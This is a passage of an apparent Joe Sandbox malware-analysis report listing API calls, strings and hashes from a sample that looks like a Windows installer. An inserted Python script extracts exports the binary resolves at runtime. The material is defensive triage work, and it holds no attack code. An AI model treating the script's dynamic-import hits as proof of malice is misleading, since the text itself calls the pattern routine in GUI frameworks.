• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
• Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
• Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
• Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
• Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                    • String ID: AllowSetForegroundWindow$user32.dll
                                                                                    • API String ID: 1782028327-3855017861
                                                                                    • Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                    • Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
                                                                                    • Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                    • Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: NotifyWinEvent$dD$user32.dll
                                                                                    • API String ID: 1646373207-754903266
                                                                                    • Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                    • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                                    • Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                    • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
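The three records above (String IDs ChangeWindowMessageFilter, AllowSetForegroundWindow and NotifyWinEvent, each paired with GetModuleHandleA followed by GetProcAddress) are the evidence behind the "Contains functionality to dynamically determine API calls" signature in the overview: the exports are looked up at runtime rather than declared in the import table. The same pattern is routine in GUI frameworks that guard newer user32 exports behind a runtime lookup, so on its own it is a triage lead, not proof of malice. The script below is an added example, not Joe Sandbox output or code from the sample; it parses function records in the layout used by this listing and pulls out the module and export names each resolver function looks up. The sample text is constructed to mirror records from this page, the cross-check against the String ID field is my own heuristic, and the pattern of stack slots appearing as call arguments is an assumption about how the report prints arguments.

```python
"""Added example: extract runtime-resolved imports from Joe Sandbox function records."""
import re

# Module-lookup APIs that typically precede GetProcAddress.
RESOLVERS = {
    "GetModuleHandleA", "GetModuleHandleW",
    "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
}

# "• Api.MODULE(arg,arg,...), ref: 0041ABCD"  (direct calls only; the report's
# "Part of subcall function ..." lines deliberately do not match this shape)
CALL_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
STRING_ID_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")

# Constructed sample mirroring three records of the listing (two resolvers and
# one plain paint routine); not copied verbatim from the report.
SAMPLE = """\
APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00476644
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
Strings
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
APIs
• GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
Similarity
• String ID: NotifyWinEvent$dD$user32.dll
APIs
• BeginPaint.USER32(00000000,?), ref: 00416C62
• EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
Similarity
• String ID:
"""


def split_records(text):
    """Group the listing into records, one per 'APIs' header."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": [], "string_ids": []}
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",") if a.strip()]
            current["calls"].append({"api": m.group("api"), "args": args, "ref": m.group("ref")})
            continue
        m = STRING_ID_RE.match(line)
        if m:
            current["string_ids"] = [t for t in m.group("ids").split("$") if t]
    return records


def find_dynamic_imports(text):
    """Return [{module, names, ref}] for records that resolve exports at runtime."""
    found = []
    for rec in split_records(text):
        apis = {c["api"] for c in rec["calls"]}
        if "GetProcAddress" not in apis or not (apis & RESOLVERS):
            continue
        # Assumption: the report prints nearby stack slots as arguments, so the
        # export name pushed for GetProcAddress shows up in the resolver's args.
        module, candidates = None, set()
        for c in rec["calls"]:
            if c["api"] not in RESOLVERS:
                continue
            for a in c["args"]:
                if a.lower().endswith(".dll"):
                    module = module or a.lower()
                elif IDENT_RE.match(a):          # skips '?' and hex addresses
                    candidates.add(a)
        # Keep only names that also appear in the record's String ID field;
        # stray tokens such as 'dD' or leftover stack values fall out here.
        names = sorted(candidates & set(rec["string_ids"]))
        ref = next(c["ref"] for c in rec["calls"] if c["api"] == "GetProcAddress")
        if module and names:
            found.append({"module": module, "names": names, "ref": ref})
    return found


def summarize(found):
    """Collapse per-function hits into {module: [export, ...]}."""
    out = {}
    for f in found:
        out.setdefault(f["module"], set()).update(f["names"])
    return {m: sorted(n) for m, n in out.items()}


if __name__ == "__main__":
    for hit in find_dynamic_imports(SAMPLE):
        print(f"{hit['ref']}: {hit['module']} -> {', '.join(hit['names'])}")
```

Run against the full exported listing, the summary gives one compact view of every export the binary resolves by hand; comparing that set with the PE import table shows which calls the author chose to hide from static import analysis, and which are merely a framework's compatibility shims.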
                                                                                    APIs
                                                                                    • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                    • SaveDC.GDI32(?), ref: 00416C93
                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                    • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                    • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                    • String ID:
                                                                                    • API String ID: 3808407030-0
                                                                                    • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                    • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                    • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                    • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                    • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                    • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                    • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                    • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                    • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                    • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                    APIs
                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                    • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                    • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                    • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                    • String ID:
                                                                                    • API String ID: 2246927583-0
                                                                                    • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                    • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                    • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                    • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                    APIs
                                                                                      • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                    Strings
                                                                                    • Setting permissions on registry key: %s\%s, xrefs: 004725AE
                                                                                    • Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
                                                                                    • Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                    • API String ID: 1452528299-4018462623
                                                                                    • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                    • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
                                                                                    • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                    • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 262959230-0
                                                                                    • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                    • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                    • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                    • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                    APIs
                                                                                    • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                    • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                    • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                    • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A022A08830$A480
                                                                                    • String ID:
                                                                                    • API String ID: 3036329673-0
                                                                                    • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                    • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                    • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                    • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                    APIs
                                                                                    • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                    • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Enum$NameOpenResourceUniversal
                                                                                    • String ID: Z
                                                                                    • API String ID: 3604996873-1505515367
                                                                                    APIs
                                                                                    • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DrawText$EmptyRect
                                                                                    • String ID:
                                                                                    • API String ID: 182455014-2867612384
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                                      • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                                    • 73A0A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                    • String ID: ...\
                                                                                    • API String ID: 2998766281-983595016
                                                                                    APIs
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                                    • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                    • String ID: <$SuG
                                                                                    • API String ID: 893404051-1504269210
                                                                                    APIs
                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                    • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ExitMessageProcess
                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                    • API String ID: 1220098344-2970929446
                                                                                    APIs
                                                                                      • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                                    • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                    • API String ID: 1312246647-2435364021
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                                    • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                                    Strings
                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                                    • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                    • API String ID: 3850602802-3720027226
                                                                                    APIs
                                                                                      • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    • GetFocus.USER32 ref: 004771FF
                                                                                    • GetKeyState.USER32(0000007A), ref: 00477211
                                                                                    • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: FocusMessageStateTextWaitWindow
                                                                                    • String ID: Wnd=$%x
                                                                                    • API String ID: 1381870634-2927251529
                                                                                    APIs
                                                                                    • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Time$File$LocalSystem
                                                                                    • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                    • API String ID: 1748579591-1013271723
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                    • API String ID: 47109696-2631785700
                                                                                    • Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                    • Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
                                                                                    • Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                    • Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                                    • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                                    Strings
                                                                                    • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                                    • CSDVersion, xrefs: 00481F70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
